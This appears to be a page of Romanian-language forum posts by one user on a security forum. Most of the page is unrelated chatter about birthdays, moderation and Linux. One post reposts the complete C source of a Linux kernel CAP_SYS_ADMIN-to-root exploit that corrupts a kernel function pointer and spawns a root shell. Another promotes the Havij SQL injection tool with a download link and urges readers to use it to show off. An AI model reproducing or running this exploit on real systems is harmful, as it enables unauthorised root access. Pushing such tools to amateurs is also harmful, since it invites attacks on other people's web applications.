Nytro

Linux Kernel CAP_SYS_ADMIN to root Exploit Nu m-am uitat inca peste el, cand am timp vad care e treaba. /* * Linux Kernel CAP_SYS_ADMIN to root exploit * by Dan Rosenberg * @djrbliss on twitter * * Usage: * gcc -w caps-to-root.c -o caps-to-root * sudo setcap cap_sys_admin+ep caps-to-root * ./caps-to-root * * This exploit is NOT stable: * * * It only works on 32-bit x86 machines * * * It only works on >= 2.6.34 kernels (it could probably be ported back, but * it involves winning a race condition) * * * It requires symbol support for symbols that aren't included by default in * several distributions * * * It requires the Phonet protocol, which may not be compiled on some * distributions * * * You may experience problems on multi-CPU systems * * It has been tested on a stock Ubuntu 10.10 installation. I wouldn't be * surprised if it doesn't work on other distributions. * * ---- * * Lately there's been a lot of talk about how a large subset of Linux * capabilities are equivalent to root. CAP_SYS_ADMIN is a catch-all * capability that, among other things, allows mounting filesystems and * injecting commands into an administrator's shell - in other words, it * trivially allows you to get root. However, I found another way to get root * from CAP_SYS_ADMIN...the hard way. * * This exploit leverages a signedness error in the Phonet protocol. By * specifying a negative protocol index, I can craft a series of fake * structures in userspace and cause the incrementing of an arbitrary kernel * address, which I then leverage to execute arbitrary kernel code. * * Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth, * and bla. * */ #include <stdio.h> #include <fcntl.h> #include <sys/socket.h> #include <errno.h> #include <string.h> #include <linux/capability.h> #include <sys/utsname.h> #include <sys/mman.h> #include <unistd.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int getroot(void) { commit_creds(prepare_kernel_cred(0)); return 0; } int konami(void) { /* Konami code! */ asm("inc %edx;" /* UP */ "inc %edx;" /* UP */ "dec %edx;" /* DOWN */ "dec %edx;" /* DOWN */ "shl %edx;" /* LEFT */ "shr %edx;" /* RIGHT */ "shl %edx;" /* LEFT */ "shr %edx;" /* RIGHT */ "push %ebx;" /* B */ "pop %ebx;" "push %eax;" /* A */ "pop %eax;" "mov $getroot, %ebx;" "call *%ebx;"); /* START */ return 0; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char * argv[]) { int sock, proto, i, offset = -1; unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr; void * map; /* Create a socket to load the module for symbol support */ printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); sock = socket(PF_PHONET, SOCK_DGRAM, 0); if(sock < 0) { if(errno == EPERM) printf("[*] You don't have CAP_SYS_ADMIN.\n"); else printf("[*] Failed to open Phonet socket.\n"); return -1; } /* Resolve kernel symbols */ printf("[*] Resolving kernel symbols...\n"); proto_tab = get_kernel_sym("proto_tab"); pn_ops = get_kernel_sym("phonet_dgram_ops"); pn_ioctl = get_kernel_sym("pn_socket_ioctl"); commit_creds = get_kernel_sym("commit_creds"); prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred"); if(!proto_tab || !commit_creds || !prepare_kernel_cred || !pn_ops || !pn_ioctl) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } /* Thanks bla, for reminding me how to do basic math */ landing = 0x20000000; proto = 1 << 31 | (landing - proto_tab) >> 2; /* Map it */ printf("[*] Preparing fake structures...\n"); map = mmap((void *)landing, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); return -1; } /* Pointer to phonet_protocol struct */ ptr = (unsigned long *)landing; ptr[0] = &ptr[1]; /* phonet_protocol struct */ for(i = 1; i < 4; i++) ptr[i] = &ptr[4]; /* proto struct */ for(i = 4; i < 204; i++) ptr[i] = &ptr[204]; /* First, do a test run to calculate any offsets */ target = 0x30000000; /* module struct */ for(i = 204; i < 404; i++) ptr[i] = target; /* Map it */ map = mmap((void *)0x30000000, 0x2000000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); return -1; } printf("[*] Calculating offsets...\n"); socket(PF_PHONET, SOCK_DGRAM, proto); ptr = 0x30000000; for(i = 0; i < 0x800000; i++) { if(ptr[i] != 0) { offset = i * sizeof(void *); break; } } if(offset == -1) { printf("[*] Test run failed.\n"); return -1; } /* MSB of pn_ioctl */ target = pn_ops + 10 * sizeof(void *) - 1 - offset; /* Re-fill the module struct */ ptr = (unsigned long *)landing; for(i = 204; i < 404; i++) ptr[i] = target; /* Push pn_ioctl fptr into userspace */ printf("[*] Modifying function pointer...\n"); landing = pn_ioctl; while((landing & 0xff000000) != 0x10000000) { socket(PF_PHONET, SOCK_DGRAM, proto); landing += 0x01000000; } /* Map it */ map = mmap((void *)(landing & ~0xfff), 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map payload area.\n"); return -1; } /* Copy payload */ memcpy((void *)landing, &konami, 1024); printf("[*] Executing Konami code at ring0...\n"); ioctl(sock, 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] Konami code worked! Have a root shell.\n"); execl("/bin/sh", "/bin/sh", NULL); } Sursa: Linux Kernel CAP_SYS_ADMIN to root Exploit

Havij v1.14 Advanced SQL Injection Jan 08, 2011 Description: Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. What's New? * Sybase (ASE) database added. * Sybase (ASE) Blind database added. * Time based method for MsSQL added. * Time based method for MySQL added. * mod_security bypass added. * Pause button added. * Basic authentication added * Digest authentication added. * Post Data field added * bugs related with dot character in database name fixed * syntax over writing when defined by user in blind injections fixed. * mssql database detection from error when using JDBC driver corrected. * time out bug in md5 cracker fixed. * default value bug fixed * string encode bug fixed in PostgreSQL * injecting URL rewrite pages added. * injecting into any part of http request like Cookie, User-Agent, Referer, etc made available * a bug in finding string column fixed. (specially for MySQL) * Finding columns count in mysql when input value is non effective added. * window resize bug in custom DPI setting fixed. * some bugs in finding row count fixed. * getting database name in mssql error based when injection type is guessed integer but it's string fixed. Features: http://itsecteam.com/en/projects/project1.htm How to use This tool is for exploiting SQL Injection bugs in web application. For using this tool you should know a little about SQL Injections. Enter target url and select http method then click Analyze. Note: Try to url be valid input that returns a normal page not a 404 or error page. Download: http://itsecteam.com/files/havij/Havij1.14Free.rar Hai baietii, fiti 1337 (script-kiddie...), aratati ca sunteti in stare sa folositi un program si vreau sa vad aere de mai hackeri la Show Off PS: Nu l-am incercat, nu stiu daca e infectat, dar cum il veti descarca de pe site-ul oficial cred ca nu este nici o problema.

Deocamdata nu am timp, o sa incep sesiunea, dar dupa seseiune o sa aloc mai mult timp pentru RST (daca nu ma angajez undeva) si treburile vor merge mai bine.

Si cam ce anume s-ar posta acolo? Ce ati posta de exemplu? Vreau niste exemple concrete. Ceva imi spune ca va fi cam pustie acea categorie.

Poate nu au poze clare cu acea galaxie si au vrut doar sa arate o imagine asemanatoare acelei galaxii. Ma refer la faptul ca este posibil sa aiba multe informatii despre acea galaxie, dar nu o fotografie concreta care sa fie relativ clara si care sa poata fi afisata publicului larg, astfel au creat acea imagine mai mult descriptiva a acelei fotografii.

Normal, stiri gen "Cancan", adica de 2 lei. Nici eu nu as vrea sa se inchida. Poti afla incredibil de mult informatii despre prieteni, despre cum gandesc, despre ce fac, tot felul de prostii.

Multumesc tuturor si la multi ani celorlalti membri care isi serbeaza azi ziua de nastere. Sa beti ceva si pentru mine, si eu o sa beau ceva pentru voi. romanu: Nu toti moderatorii/administratorii sunt Ioni PS: Ma puteti injura, critica etc. Nu ma supar, nu dau warn/ban. Hai, cat aveti ocazia :->

Haaa mersi boss, la multi ani si tie bre, sa ne traiesti. :-> Trebuie sa ne dam de baut unu altuia. Oricum inca trebuie sa iti dau 2 beri Mersi baieti. Azi nu dau banuri/warnuri

Sunt usoare, doar 9 e greu, trebuie sa faci Backtracking.

Warn tuturor. E treaba administratorilor si a moderatorilor asta. Ati facut offtopic toti

Toate sunt JavaScript. Nu sunt grele, trebuie doar putina imaginatie. Deocamdata sunt la nivelul 9, cred ca trec mai departe maine. http://www.telerie-effegibi.it/daniele/default.asp?lev=1 Bafta.

Windows? Nu, Linux. Si asta inseamna: nici un program piratat. Doar muzica (manele) mai descarc din cand in cand, si filme. De ce sa dau bani pe ceva cand pot avea gratis? E modul clasic si practic de a gandi.

Nu piratam (poate doar unii dintre noi, intr-o mica masura), noi doar folosim produse piratate de altii, de fapt noi suntem victime ale pirateriei

Ubuntu, Mandriva. Poti cauta tutoriale de instalare si de folosire, sunt o gramada.

Acrobat Reader, adica Adobe Reader, pentru a putea vizualiza fisiere PDF. Desi sunt si multe alte alternative.

Pare mai serios decat Blackbuntu, dar lista de tool-uri preinstalate este mai mica, si nu cred ca ma refer numai la cele de pentest. Hmm, sunt sigur ca o sa il incerc, dar deocamdata raman la ce am. Oricum, din moment ce e bazat pe Ubuntu e clar ca e extrem de prietenos cu utilizatorii, deci nu cred ca e o problema sa il foloseasca si cei care nu au mai folosit Linux pana acum.

Pacaleala de 1 aprilie? Dupa atata timp se mai gaseste un ratat care sa redeschida topicul.

Si cum face toata Europa sa dispara? Imprastie lava pe mii de kilometri? Poate fumul sa se imprastie in toata lumea si sa provoace cine stie ce "iarna nucleara", dar nu vad cum ar putea face sa dispara Europa.

De cea de astazi, de la ora 10.

Sa vedem: informatie, securitate, atac, programare, gratuit, distractie, profit, acces. Cred ca ar fi multe de spus.

Ar fi de preferat in limba romana. De fapt cred ca merge mai bine in engleza. Adica e "Romanian Security Team" nu "Echipa Romana de Securitate"

"Accesul la informatie este un drept, noi sustinem acest drept."

Am ales cateva texte mai interesante din topicul de la Anunturi, si supunem la vot, sa vedem ce text va aparea pe header. Ideea ar fi sa se potriveasca cat mai bine in contextul de fata, de aceea nu vedeti la optiunile de votare "To be, or not to be...". Deci ganditi putin inainte de a vota.

Stirile trebuie sa fie din domeniul IT, nu numai "security"

M-am referit la toata lumea, dar in special la cei care vin cu tot felul de sugestii si comenteaza la adresa celorlalti. Daca vrei sa te faci util, si ai timp, poti face un tutorial, e doar o sugestie. Si nu e adresata numai tie, ci tuturor.